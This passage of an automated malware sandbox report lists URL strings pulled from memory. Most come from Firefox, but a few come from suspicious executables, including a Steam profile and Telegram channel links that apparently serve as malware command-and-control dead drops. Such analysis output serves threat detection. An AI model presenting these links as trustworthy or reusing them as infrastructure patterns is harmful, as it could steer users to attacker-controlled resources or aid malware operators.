                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/dashboard
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/preferences
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
                          Source: firefox.exe, 00000018.00000002.3770660832.0000143CDFE04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://oauth.accounts.firefox.com/v1
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
                          Source: firefox.exe, 00000018.00000003.2591625620.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2603859381.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3190084516.000001C7B0913000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.comXPCSHELL_TESTING_MODULES_URI/backgroundtasks/BackgroundTask_
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                          Source: firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/shims/mochitest-shim-2.js
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/shims/mochitest-shim-2.js/shims/mochitest-shim-2.jsgoogle
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2621000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B250E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B2506000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B2509000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1AEE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2621000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B250E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                          Source: 4508a44a11.exe, 4508a44a11.exe, 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 4508a44a11.exe, 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927
                          Source: 4508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
                          Source: 6f9ea40b81.exe, 00000008.00000003.3154201313.00000000036AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3546211852.000001C7B3F52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                          Source: b6866cbf49.exe, 0000001B.00000003.3123017357.000000000BDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translationtranslations-panel-settings-always-translate-unkno
                          Source: 6f9ea40b81.exe, 00000008.00000003.3273297679.0000000003776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: b6866cbf49.exe, 0000001B.00000003.3123017357.000000000BDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.0000000003739000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3154546114.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3177784358.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3154201313.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3183397116.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2851807192.0000000005B71000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000784000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.0000000003714000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3154546114.0000000003683000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.0000000003739000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3154546114.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3177784358.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3154201313.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3183397116.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2851807192.0000000005B71000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000784000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.0000000003714000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3154546114.0000000003683000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000784000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                          Source: 4508a44a11.exe, 00000007.00000002.3456117135.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                          Source: 4508a44a11.exe, 00000007.00000002.3456117135.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/2p
                          Source: 4508a44a11.exe, 4508a44a11.exe, 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 4508a44a11.exe, 00000007.00000003.2353374719.0000000000735000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3456117135.000000000071F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3456117135.0000000000700000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2382303961.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2405855755.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmp, 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2352455173.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r
                          Source: 4508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
